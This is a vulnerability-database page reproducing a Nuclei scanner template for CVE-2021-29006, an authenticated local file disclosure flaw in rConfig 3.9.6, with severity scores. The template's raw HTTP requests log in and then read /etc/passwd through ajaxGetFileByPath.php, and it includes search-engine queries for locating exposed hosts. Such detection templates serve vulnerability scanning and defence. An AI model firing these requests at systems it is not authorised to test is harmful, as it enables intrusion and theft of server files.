Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2021-29006
HistoryOct 17, 2023 - 7:20 a.m.

rConfig 3.9.6 - Local File Inclusion

2023-10-1707:20:28
ProjectDiscovery
github.com
4
cve2021
rconfig
authenticated
local file inclusion

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

6.7 Medium

AI Score

Confidence

High

0.061 Low

EPSS

Percentile

93.6%

rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.
id: CVE-2021-29006

info:
  name: rConfig 3.9.6 - Local File Inclusion
  author: r3Y3r53
  severity: medium
  description: |
    rConfig 3.9.6 is affected by a Local File Disclosure vulnerability. An authenticated user may successfully download any file on the server.
  reference:
    - https://github.com/mrojz/rconfig-exploit/blob/main/CVE-2021-29006-POC.py
    - https://nvd.nist.gov/vuln/detail/CVE-2021-29006
    - http://rconfig.com
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 6.5
    cve-id: CVE-2021-29006
    cwe-id: CWE-22
    epss-score: 0.09465
    epss-percentile: 0.94172
    cpe: cpe:2.3:a:rconfig:rconfig:3.9.6:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: rconfig
    product: rconfig
    shodan-query:
      - http.title:"rConfig"
      - http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve2021,cve,rconfig,authenticated,lfi

http:
  - raw:
      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pass={{password}}&sublogin=1
      - |
        GET /dashboard.php HTTP/1.1
        Host: {{Hostname}}
      - |
        GET /lib/ajaxHandlers/ajaxGetFileByPath.php?path=/etc/passwd HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: regex
        part: body_3
        regex:
          - 'root:.*:0:0:'

      - type: word
        part: body_2
        words:
          - 'rconfig'

      - type: status
        part: header_3
        status:
          - 200
# digest: 4a0a0047304502202a66593f5990f14cef08cd06a2cb12e312b42e73c046a4e3a92b8875e6224558022100c04d6f069d0ba1fbd4d2361d817b1a9e9dc10af26f5540980ea831342374bba0:922c64590222798bb761d5b6d8e72950

4 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

LOW

Authentication

SINGLE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:S/C:P/I:N/A:N

6.5 Medium

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

6.7 Medium

AI Score

Confidence

High

0.061 Low

EPSS

Percentile

93.6%

Related for NUCLEI:CVE-2021-29006